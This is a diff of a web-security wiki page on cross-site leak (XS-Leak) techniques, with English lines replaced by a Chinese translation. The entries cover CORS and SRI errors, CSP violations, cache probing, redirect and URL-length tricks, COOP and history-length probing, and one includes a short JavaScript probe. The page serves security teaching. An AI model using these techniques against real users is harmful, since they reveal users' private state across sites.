+- **总结:** 在安全声明 (SA) 中，CORS 错误消息无意中暴露了重定向请求的完整 URL。
+- **代码示例**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
-- **Summary:** In Security Assertions (SA), CORS error messages inadvertently expose the full URL of redirected requests.
-- **Code Example**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
+此技术使攻击者能够**提取跨源站点重定向的目标**，通过利用基于 Webkit 的浏览器处理 CORS 请求的方式。具体来说，当向一个根据用户状态发出重定向的目标站点发送**CORS 启用请求**时，如果浏览器随后拒绝该请求，**重定向目标的完整 URL**将在错误消息中披露。此漏洞不仅揭示了重定向的事实，还暴露了重定向的端点及其可能包含的任何**敏感查询参数**。
 
-This technique enables an attacker to **extract the destination of a cross-origin site's redirect** by exploiting how Webkit-based browsers handle CORS requests. Specifically, when a **CORS-enabled request** is sent to a target site that issues a redirect based on user state and the browser subsequently denies the request, the **full URL of the redirect's target** is disclosed within the error message. This vulnerability not only reveals the fact of the redirect but also exposes the redirect's endpoint and any **sensitive query parameters** it may contain.
+### SRI 错误
 
-### SRI Error
+- **包含方法**: Fetch API
+- **可检测差异**: Header
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
+- **总结:** 在安全声明 (SA) 中，CORS 错误消息无意中暴露了重定向请求的完整 URL。
+- **代码示例**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
-- **Summary:** In Security Assertions (SA), CORS error messages inadvertently expose the full URL of redirected requests.
-- **Code Example**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
+攻击者可以利用**详细的错误消息**推断跨源响应的大小。这是由于子资源完整性 (SRI) 的机制，该机制使用完整性属性验证从 CDN 获取的资源未被篡改。为了使 SRI 在跨源资源上工作，这些资源必须是**CORS 启用的**；否则，它们不受完整性检查。在安全声明 (SA) 中，与 CORS 错误 XS-Leak 类似，错误消息可以在带有完整性属性的 fetch 请求失败后被捕获。攻击者可以故意**触发此错误**，通过将**虚假的哈希值**分配给任何请求的完整性属性。在 SA 中，结果错误消息无意中揭示了请求资源的内容长度。此信息泄露使攻击者能够识别响应大小的变化，为复杂的 XS-Leak 攻击铺平了道路。
 
-An attacker can exploit **verbose error messages** to deduce the size of cross-origin responses. This is possible due to the mechanism of Subresource Integrity (SRI), which uses the integrity attribute to validate that resources fetched, often from CDNs, haven't been tampered with. For SRI to work on cross-origin resources, these must be **CORS-enabled**; otherwise, they're not subject to integrity checks. In Security Assertions (SA), much like the CORS error XS-Leak, an error message can be captured after a fetch request with an integrity attribute fails. Attackers can deliberately **trigger this error** by assigning a **bogus hash value** to the integrity attribute of any request. In SA, the resulting error message inadvertently reveals the content length of the requested resource. This information leakage allows an attacker to discern variations in response size, paving the way for sophisticated XS-Leak attacks.
+### CSP 违规/检测
 
-### CSP Violation/Detection
+- **包含方法**: 弹出窗口
+- **可检测差异**: 状态码
+- **更多信息**: [https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects)
+- **总结:** 如果我们访问的受害者网站尝试重定向到不同的域，CSP 将触发可检测的错误。
+- **代码示例**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Status Code
-- **More info**: [https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects)
-- **Summary:** Allowing only the victims website in the CSP if we accessed it tries to redirect to a different domain the CSP will trigger a detectable error.
-- **Code Example**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
+XS-Leak 可以利用 CSP 检测跨源站点是否重定向到不同的源。此泄漏可以检测重定向，但此外，重定向目标的域也会泄漏。此攻击的基本思路是**允许攻击者站点上的目标域**。一旦向目标域发出请求，它**重定向**到一个跨源域。**CSP 阻止**对其的访问并创建一个**违规报告作为泄漏技术**。根据浏览器的不同，**此报告可能泄漏重定向的目标位置**。\
+现代浏览器不会指示重定向到的 URL，但您仍然可以检测到跨源重定向已被触发。
 
-A XS-Leak can use the CSP to detect if a cross-origin site was redirected to a different origin. This leak can detect the redirect, but additionally, the domain of the redirect target leaks. The basic idea of this attack is to **allow the target domain on the attacker site**. Once a request is issued to the target domain, it **redirects** to a cross-origin domain. **CSP blocks** the access to it and creates a **violation report used as a leak technique**. Depending on the browser, **this report may leak the target location of the redirect**.\
-Modern browsers won't indicate the URL it was redirected to, but you can still detect that a cross-origin redirect was triggered.
+### 缓存
 
-### Cache
+- **包含方法**: 框架, 弹出窗口
+- **可检测差异**: 页面内容
+- **更多信息**: [https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
+- **总结:** 从缓存中清除文件。打开目标页面检查文件是否存在于缓存中。
+- **代码示例:**
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
-- **Summary:** Clear the file from the cache. Opens target page checks if the file is present in the cache.
-- **Code Example:**
+浏览器可能为所有网站使用一个共享缓存。无论其来源如何，都可以推断目标页面是否**请求了特定文件**。
 
-Browsers might use one shared cache for all websites. Regardless of their origin, it is possible to deduct whether a target page has **requested a specific file**.
+如果一个页面仅在用户登录时加载图像，您可以**使资源失效**（以便如果它被缓存则不再缓存，更多信息链接），**执行一个请求**，该请求可能加载该资源，并尝试使用**错误请求**加载该资源（例如，使用过长的 referer 头）。如果资源加载**没有触发任何错误**，则是因为它被**缓存**。
 
-If a page loads an image only if the user is logged in, you can **invalidate** the **resource** (so it's no longer cached if it was, see more info links), **perform a request** that could load that resource and try to load the resource **with a bad request** (e.g. using an overlong referer header). If the resource load **didn't trigger any error**, it's because it was **cached**.
+### CSP 指令
 
-### CSP Directive
+- **包含方法**: 框架
+- **可检测差异**: Header
+- **更多信息**: [https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
+- **总结:** CSP 头指令可以通过 CSP iframe 属性进行探测，揭示策略细节。
+- **代码示例**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Header
-- **More info**: [https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
-- **Summary:** CSP header directives can be probed using the CSP iframe attribute, revealing policy details.
-- **Code Example**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
-
-A novel feature in Google Chrome (GC) allows web pages to **propose a Content Security Policy (CSP)** by setting an attribute on an iframe element, with policy directives transmitted along with the HTTP request. Normally, the embedded content must **authorize this via an HTTP header**, or an **error page is displayed**. However, if the iframe is already governed by a CSP and the newly proposed policy isn't more restrictive, the page will load normally. This mechanism opens a pathway for an attacker to **detect specific CSP directives** of a cross-origin page by identifying the error page. Although this vulnerability was marked as fixed, our findings reveal a **new leak technique** capable of detecting the error page, suggesting that the underlying problem was never fully addressed.
+Google Chrome (GC) 中的一个新功能允许网页通过在 iframe 元素上设置属性来**提议内容安全策略 (CSP)**，并将策略指令与 HTTP 请求一起传输。通常，嵌入的内容必须**通过 HTTP 头进行授权**，否则将显示**错误页面**。然而，如果 iframe 已经受到 CSP 的管理，并且新提议的策略不更严格，则页面将正常加载。此机制为攻击者提供了一条路径，通过识别错误页面来**检测跨源页面的特定 CSP 指令**。尽管此漏洞被标记为已修复，但我们的发现揭示了一种**新的泄漏技术**，能够检测错误页面，表明根本问题从未完全解决。
 
 ### **CORP**
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Header
-- **More info**: [**https://xsleaks.dev/docs/attacks/browser-features/corp/**](https://xsleaks.dev/docs/attacks/browser-features/corp/)
-- **Summary:** Resources secured with Cross-Origin Resource Policy (CORP) will throw an error when fetched from a disallowed origin.
-- **Code Example**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
+- **包含方法**: Fetch API
+- **可检测差异**: Header
+- **更多信息**: [**https://xsleaks.dev/docs/attacks/browser-features/corp/**](https://xsleaks.dev/docs/attacks/browser-features/corp/)
+- **总结:** 使用跨源资源策略 (CORP) 保护的资源在从不允许的源获取时会抛出错误。
+- **代码示例**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
 
-The CORP header is a relatively new web platform security feature that when set b**locks no-cors cross-origin requests to the given resource**. The presence of the header can be detected, because a resource protected with CORP will **throw an error when fetched**.
+CORP 头是一个相对较新的网络平台安全特性，当设置时**阻止从给定资源的无 CORS 跨源请求**。可以检测到该头的存在，因为受 CORP 保护的资源在被获取时会**抛出错误**。
 
 ### CORB
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Headers
-- **More info**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
-- **Summary**: CORB can allow attackers to detect when the **`nosniff` header is present** in the request.
-- **Code Example**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)
+- **包含方法**: HTML 元素
+- **可检测差异**: Headers
+- **更多信息**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
+- **总结**: CORB 可以允许攻击者检测请求中是否存在**`nosniff` 头**。
+- **代码示例**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)
 
-Check the link for more information about the attack.
+查看链接以获取有关攻击的更多信息。
 
-### CORS error on Origin Reflection misconfiguration <a href="#cors-error-on-origin-reflection-misconfiguration" id="cors-error-on-origin-reflection-misconfiguration"></a>
+### CORS 错误在源反射错误配置上 <a href="#cors-error-on-origin-reflection-misconfiguration" id="cors-error-on-origin-reflection-misconfiguration"></a>
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Headers
-- **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
-- **Summary**: If the Origin header is reflected in the header `Access-Control-Allow-Origin` it's possible to check if a resource is in the cache already.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
+- **包含方法**: Fetch API
+- **可检测差异**: Headers
+- **更多信息**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
+- **总结**: 如果 Origin 头在 `Access-Control-Allow-Origin` 头中被反射，则可以检查资源是否已经在缓存中。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
 
-In case the **Origin header** is being **reflected** in the header `Access-Control-Allow-Origin` an attacker can abuse this behaviour to try to **fetch** the **resource** in **CORS** mode. If an **error** **isn't** triggered, it means that it was **correctly retrieved form the web**, if an error is **triggered**, it's because it was **accessed from the cache** (the error appears because the cache saves a response with a CORS header allowing the original domain and not the attackers domain)**.**\
-Note that if the origin isn't reflected but a wildcard is used (`Access-Control-Allow-Origin: *`) this won't work.
+如果**Origin 头**在 `Access-Control-Allow-Origin` 头中被**反射**，攻击者可以利用此行为尝试在**CORS** 模式下**获取**该**资源**。如果没有触发**错误**，则意味着它是**正确地从网络获取的**；如果触发了错误，则是因为它是**从缓存中访问的**（错误出现是因为缓存保存了一个带有允许原始域而不是攻击者域的 CORS 头的响应）。\
+请注意，如果未反射原点但使用了通配符（`Access-Control-Allow-Origin: *`），则此方法将无效。
 
-## Readable Attributes Technique
+## 可读属性技术
 
-### Fetch Redirect
+### Fetch 重定向
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Status Code
-- **More info**: [https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html](https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html)
-- **Summary:** GC and SA allow to check the response’s type (opaque-redirect) after the redirect is finished.
-- **Code Example**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)
+- **包含方法**: Fetch API
+- **可检测差异**: 状态码
+- **更多信息**: [https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html](https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html)
+- **总结:** GC 和 SA 允许在重定向完成后检查响应的类型（opaque-redirect）。
+- **代码示例**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)
 
-Submitting a request using the Fetch API with `redirect: "manual"` and other params, it's possible to read the `response.type` attribute and if it's equals to `opaqueredirect` then the response was a redirect.
+使用 Fetch API 提交请求，设置 `redirect: "manual"` 和其他参数，可以读取 `response.type` 属性，如果它等于 `opaqueredirect`，则响应是重定向。
 
 ### COOP
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.4), [https://xsleaks.dev/docs/attacks/window-references/](https://xsleaks.dev/docs/attacks/window-references/)
-- **Summary:** Pages safeguarded by Cross-Origin Opener Policy (COOP) prevent access from cross-origin interactions.
-- **Code Example**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
+- **包含方法**: 弹出窗口
+- **可检测差异**: Header
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.4), [https://xsleaks.dev/docs/attacks/window-references/](https://xsleaks.dev/docs/attacks/window-references/)
+- **总结:** 受跨源打开者策略 (COOP) 保护的页面防止跨源交互的访问。
+- **代码示例**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
 
-An attacker is capable of deducing the presence of the Cross-Origin Opener Policy (COOP) header in a cross-origin HTTP response. COOP is utilized by web applications to hinder external sites from obtaining arbitrary window references. The visibility of this header can be discerned by attempting to access the **`contentWindow` reference**. In scenarios where COOP is applied conditionally, the **`opener` property** becomes a telltale indicator: it's **undefined** when COOP is active, and **defined** in its absence.
+攻击者能够推断跨源 HTTP 响应中跨源打开者策略 (COOP) 头的存在。COOP 被网络应用程序用于阻止外部站点获取任意窗口引用。可以通过尝试访问**`contentWindow` 引用**来识别此头的可见性。在 COOP 有条件应用的情况下，**`opener` 属性**成为一个明显的指示器：当 COOP 活动时，它是**未定义的**，而在没有 COOP 的情况下是**定义的**。
 
-### URL Max Length - Server Side
+### URL 最大长度 - 服务器端
 
-- **Inclusion Methods**: Fetch API, HTML Elements
-- **Detectable Difference**: Status Code / Content
-- **More info**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
-- **Summary:** Detect differences in responses because of the redirect response length migt be too large that the server replays with an error and an alert is generated.
-- **Code Example**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
+- **包含方法**: Fetch API, HTML 元素
+- **可检测差异**: 状态码 / 内容
+- **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
+- **总结:** 检测响应中的差异，因为重定向响应长度可能太大，服务器会回复错误并生成警报。
+- **代码示例**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
 
-If a server-side redirect uses **user input inside the redirection** and **extra data**. It's possible to detect this behaviour because usually **servers** has a **limit request length**. If the **user data** is that **length - 1**, because the **redirect** is using **that data** and **adding** something **extra**, it will trigger an **error detectable via Error Events**.
+如果服务器端重定向使用**用户输入进行重定向**和**额外数据**。可以检测到这种行为，因为通常**服务器**有一个**请求长度限制**。如果**用户数据**是**长度 - 1**，因为**重定向**使用**该数据**并**添加**一些**额外**内容，它将触发一个**可通过错误事件检测到的错误**。
 
-If you can somehow set cookies to a user, you can also perform this attack by **setting enough cookies** ([**cookie bomb**](../hacking-with-cookies/cookie-bomb.md)) so with the **response increased size** of the **correct response** an **error** is triggered. In this case, remember that is you trigger this request from a same site, `<script>` will automatically send the cookies (so you can check for errors).\
-An example of the **cookie bomb + XS-Search** can be found in the Intended solution of this writeup: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
+如果您可以以某种方式将 cookies 设置给用户，您还可以通过**设置足够的 cookies**（[**cookie bomb**](../hacking-with-cookies/cookie-bomb.md)）来执行此攻击，因此**正确响应**的**响应大小**增加会触发一个**错误**。在这种情况下，请记住，如果您从同一站点触发此请求，`<script>` 将自动发送 cookies（因此您可以检查错误）。\
+有关**cookie bomb + XS-Search**的示例可以在此写作的意图解决方案中找到：[https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
 
-`SameSite=None` or to be in the same context is usually needed for this type of attack.
+`SameSite=None` 或处于相同上下文通常是此类攻击所需的。
 
-### URL Max Length - Client Side
+### URL 最大长度 - 客户端
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Status Code / Content
-- **More info**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
-- **Summary:** Detect differences in responses because of the redirect response length might too large for a request that a difference can be noticed.
-- **Code Example**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
+- **包含方法**: 弹出窗口
+- **可检测差异**: 状态码 / 内容
+- **更多信息**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
+- **总结:** 检测响应中的差异，因为重定向响应长度可能太大，以至于可以注意到差异。
+- **代码示例**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
 
-According to [Chromium documentation](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url_display_guidelines/url_display_guidelines.md#URL-Length), Chrome's maximum URL length is 2MB.
+根据 [Chromium 文档](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url_display_guidelines/url_display_guidelines.md#URL-Length)，Chrome 的最大 URL 长度为 2MB。
 
-> In general, the _web platform_ does not have limits on the length of URLs (although 2^31 is a common limit). _Chrome_ limits URLs to a maximum length of **2MB** for practical reasons and to avoid causing denial-of-service problems in inter-process communication.
+> 一般来说，_web 平台_ 对 URL 的长度没有限制（尽管 2^31 是一个常见限制）。_Chrome_ 将 URL 限制为最大长度 **2MB**，出于实际原因并避免在进程间通信中造成拒绝服务问题。
 
-Therefore if the **redirect URL responded is larger in one of the cases**, it's possible to make it redirect with a **URL larger than 2MB** to hit the **length limit**. When this happens, Chrome shows an **`about:blank#blocked`** page.
+因此，如果**重定向 URL 在某些情况下响应的大小更大**，则可以使其重定向到**大于 2MB 的 URL**以达到**长度限制**。当发生这种情况时，Chrome 显示一个**`about:blank#blocked`** 页面。
 
-The **noticeable difference**, is that if the **redirect** was **completed**, `window.origin` throws an **error** because a cross origin cannot access that info. However, if the **limit** was \*\*\*\* hit and the loaded page was **`about:blank#blocked`** the window's **`origin`** remains that of the **parent**, which is an **accessible information.**
+**显著差异**是，如果**重定向**已**完成**，`window.origin` 会抛出一个**错误**，因为跨源无法访问该信息。然而，如果**限制**被\*\*\*\*触及且加载的页面是**`about:blank#blocked`**，则窗口的**`origin`** 保持为**父级**的，这是一条**可访问的信息**。
 
-All the extra info needed to reach the **2MB** can be added via a **hash** in the initial URL so it will be **used in the redirect**.
+所有达到**2MB**所需的额外信息可以通过初始 URL 中的**哈希**添加，以便在重定向中**使用**。
 
 {{#ref}}
 url-max-length-client-side.md
 {{#endref}}
 
-### Max Redirects
+### 最大重定向
 
-- **Inclusion Methods**: Fetch API, Frames
-- **Detectable Difference**: Status Code
-- **More info**: [https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76)
-- **Summary:** User the browser's redirect limit to ascertain the occurrence of URL redirections.
-- **Code Example**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
+- **包含方法**: Fetch API, 框架
+- **可检测差异**: 状态码
+- **更多信息**: [https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76)
+- **总结:** 利用浏览器的重定向限制来确定 URL 重定向的发生。
+- **代码示例**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
 
-If the **max** number of **redirects** to follow of a browser is **20**, an attacker could try to load his page with **19 redirects** and finally **send the victim** to the tested page. If an **error** is triggered, then the page was trying to **redirect the victim**.
+如果浏览器的**最大**重定向次数为**20**，攻击者可以尝试用**19 次重定向**加载他的页面，最后**将受害者**发送到测试页面。如果触发了**错误**，则页面试图**重定向受害者**。
 
-### History Length
+### 历史长度
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: Redirects
-- **More info**: [https://xsleaks.dev/docs/attacks/navigations/](https://xsleaks.dev/docs/attacks/navigations/)
-- **Summary:** JavaScript code manipulates the browser history and can be accessed by the length property.
-- **Code Example**: [https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)
+- **包含方法**: 框架, 弹出窗口
+- **可检测差异**: 重定向
+- **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/](https://xsleaks.dev/docs/attacks/navigations/)
+- **总结:** JavaScript 代码操纵浏览器历史记录，并可以通过长度属性访问。
+- **代码示例**: [https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)
 
-The **History API** allows JavaScript code to manipulate the browser history, which **saves the pages visited by a user**. An attacker can use the length property as an inclusion method: to detect JavaScript and HTML navigation.\
-**Checking `history.length`**, making a user **navigate** to a page, **change** it **back** to the same-origin and **checking** the new value of **`history.length`**.
+**历史 API** 允许 JavaScript 代码操纵浏览器历史记录，**保存用户访问的页面**。攻击者可以使用长度属性作为包含方法：检测 JavaScript 和 HTML 导航。\
+**检查 `history.length`**，使用户**导航**到一个页面，**返回**到同源并**检查**新值的**`history.length`**。
 
-### History Length with same URL
+### 同一 URL 的历史长度
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: If URL is the same as the guessed one
-- **Summary:** It's possible to guess if the location of a frame/popup is in an specific URL abusing the history length.
-- **Code Example**: Below
-
-An attacker could use JavaScript code to **manipulate the frame/pop-up location to a guessed one** and **immediately** **change it to `about:blank`**. If the history length increased it means the URL was correct and it had time to **increase because the URL isn't reloaded if it's the same**. If it didn't increased it means it **tried to load the guessed URL** but because we **immediately after** loaded **`about:blank`**, the **history length did never increase** when loading the guessed url.
+- **包含方法**: 框架, 弹出窗口
+- **可检测差异**: 如果 URL 与猜测的 URL 相同
+- **总结:** 可以通过操纵历史长度来猜测框架/弹出窗口的位置是否在特定 URL 中。
+- **代码示例**: 以下
 
+攻击者可以使用 JavaScript 代码**操纵框架/弹出窗口的位置到猜测的 URL**，并**立即**将其**更改为 `about:blank`**。如果历史长度增加，则意味着 URL 是正确的，并且有时间**增加，因为如果 URL 相同则不会重新加载**。如果没有增加，则意味着它**尝试加载猜测的 URL**，但因为我们**立即之后**加载了**`about:blank`**，所以**加载猜测的 URL 时历史长度从未增加**。
 ```javascript
 async function debug(win, url) {
-  win.location = url + "#aaa"
-  win.location = "about:blank"
-  await new Promise((r) => setTimeout(r, 500))
-  return win.history.length
+win.location = url + "#aaa"
+win.location = "about:blank"
+await new Promise((r) => setTimeout(r, 500))
+return win.history.length
 }
 
 win = window.open("https://example.com/?a=b")
@@ -690,232 +683,227 @@ win = window.open("https://example.com/?a=b")
 await new Promise((r) => setTimeout(r, 2000))
 console.log(await debug(win, "https://example.com/?a=b"))
 ```
-
 ### Frame Counting
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/frame-counting/](https://xsleaks.dev/docs/attacks/frame-counting/)
-- **Summary:** Evaluate the quantity of iframe elements by inspecting the `window.length` property.
-- **Code Example**: [https://xsinator.com/testing.html#Frame%20Count%20Leak](https://xsinator.com/testing.html#Frame%20Count%20Leak)
+- **包含方法**: Frames, Pop-ups
+- **可检测差异**: Page Content
+- **更多信息**: [https://xsleaks.dev/docs/attacks/frame-counting/](https://xsleaks.dev/docs/attacks/frame-counting/)
+- **总结**: 通过检查 `window.length` 属性评估 iframe 元素的数量。
+- **代码示例**: [https://xsinator.com/testing.html#Frame%20Count%20Leak](https://xsinator.com/testing.html#Frame%20Count%20Leak)
 
-Counting the **number of frames in a web** opened via `iframe` or `window.open` might help to identify the **status of the user over that page**.\
-Moreover, if the page has always the same number of frames, checking **continuously** the number of frames might help to identify a **pattern** that might leak info.
+计算通过 `iframe` 或 `window.open` 打开的 **网页中的帧数** 可能有助于识别 **用户在该页面上的状态**。\
+此外，如果页面始终具有相同数量的帧，**持续** 检查帧数可能有助于识别可能泄露信息的 **模式**。
 
-An example of this technique is that in chrome, a **PDF** can be **detected** with **frame counting** because an `embed` is used internally. There are [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) that allow some control over the content such as `zoom`, `view`, `page`, `toolbar` where this technique could be interesting.
+这种技术的一个例子是，在 Chrome 中，**PDF** 可以通过 **帧计数** 被 **检测**，因为内部使用了 `embed`。有一些 [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) 允许对内容进行一些控制，例如 `zoom`、`view`、`page`、`toolbar`，在这种情况下，这种技术可能会很有趣。
 
 ### HTMLElements
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/)
-- **Summary:** Read the leaked value to distinguish between 2 possible states
